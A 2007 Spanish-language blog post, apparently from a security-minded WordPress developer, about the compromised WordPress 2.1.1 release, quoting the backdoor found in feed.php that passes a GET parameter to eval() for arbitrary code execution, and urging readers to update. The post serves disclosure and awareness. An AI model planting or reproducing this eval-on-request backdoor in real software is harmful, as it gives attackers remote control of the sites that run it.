Anuncia aquí

Actualización de Seguridad de WordPress

Por alex | 2 marzo 2007 | 2 Comentarios

Hace unas cuantas horas me enteré de la liberación de una nueva versión de WordPress, que según el blog oficial, un cracker obtuvo acceso a uno de los servidores de wordpress.org y puso código malicioso en las versiones descargables de la versión 2.1.1.

Casualmente descargué esta versión vulnerable de WordPress, para realizar las pruebas -y algunas correcciones- de la nueva versión del plugin PopStats. El código insertado en la versión que tengo a la mano es la siguiente (feed.php):

php:
function comment_text_phpfilter($filterdata) {
        eval($filterdata);
}

...

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

Como se puede apreciar, el código insertado es bastante peligroso puesto que permite la ejecución de código arbitrario.

Esta nueva versión, también corrige otro problemas de seguridad:

  • XSS en la parte encargada de evitar ataques de tipo CSRF.

Es recomendable que actualizen cuanto antes vuestra versión de WordPress para evitarse malos ratos.

Esta entrada fue publicada en Seguridad, Web, Wordpress, XSS

Un Comentario

  1. 1 emarts (3 de marzo de 2007, 12:10:16 am) http://blog.3l0g.com/

    Mañana, WordPress 2.1.3... pasado... WordPress 2.1.4...

Un Trackback

  1. Por Un lugar en el mundo… » Blog Archive » Actualización de seguridad para Wordpress 2.1.1 el 3 marzo 2007 a las 3:09 am

    [...] los curiosos, en buayacorp nos muestran el código introducido en el fichero feed.php: function comment_text_phpfilter($filterdata) { eval($filterdata); [...]

Publicar un Comentario

Tu email nunca será publicado o compartido. Los campos requeridos están marcados con un *

*
*

Puedes usar estas etiquetas y atributos HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>